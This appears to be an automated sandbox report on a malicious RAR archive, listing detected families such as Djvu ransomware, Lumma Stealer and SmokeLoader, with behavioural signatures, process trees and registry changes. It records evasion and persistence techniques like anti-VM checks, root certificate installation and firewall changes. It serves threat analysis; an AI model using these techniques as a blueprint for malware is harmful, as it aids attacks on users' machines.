Analysis Overview
SHA256
e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5
Threat Level: Known bad
The file file_release_4.rar was found to be: Known bad.
Malicious Activity Summary
Detected Djvu ransomware
ZGRat
Glupteba payload
Detect ZGRat V1
Lumma Stealer
Djvu Ransomware
SmokeLoader
RisePro
Stealc
Glupteba
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Modifies file permissions
Identifies Wine through registry keys
Unexpected DNS network traffic destination
Reads data files stored by FTP clients
Drops startup file
Executes dropped EXE
Checks computer location settings
UPX packed file
Loads dropped DLL
Checks BIOS information in registry
Themida packer
Reads user/profile data of web browsers
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-23 17:45
Signatures
Unsigned PE
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win7-20240220-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Modifies registry class
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2860 wrote to memory of 2280 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 212 wrote to memory of 2352 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2352 -ip 2352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 600
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
31s
Max time network
162s
Command Line
Signatures
Detect ZGRat V1
Glupteba
Glupteba payload
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe
"C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe"
C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe
"C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe"
C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe
"C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe"
C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe
"C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"
C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe
"C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe"
C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe
"C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe"
C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe
"C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe"
C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe
"C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe"
C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe
"C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe"
C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe
"C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe"
C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp" /SL5="$D0122,4124890,54272,C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"
C:\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe
.\Install.exe /MFFdidt "525403" /S
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Users\Admin\AppData\Local\Temp\38DD.exe
C:\Users\Admin\AppData\Local\Temp\38DD.exe
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
146s
Max time network
154s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1400 wrote to memory of 1104 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win7-20240221-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
123s
Max time network
134s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2852 wrote to memory of 4464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
91s
Max time network
153s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1100 wrote to memory of 5084 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win10v2004-20240221-en
Max time kernel
138s
Max time network
158s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4780 wrote to memory of 1416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1416 -ip 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 588
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:51
Platform
win10v2004-20240221-en
Max time kernel
166s
Max time network
289s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
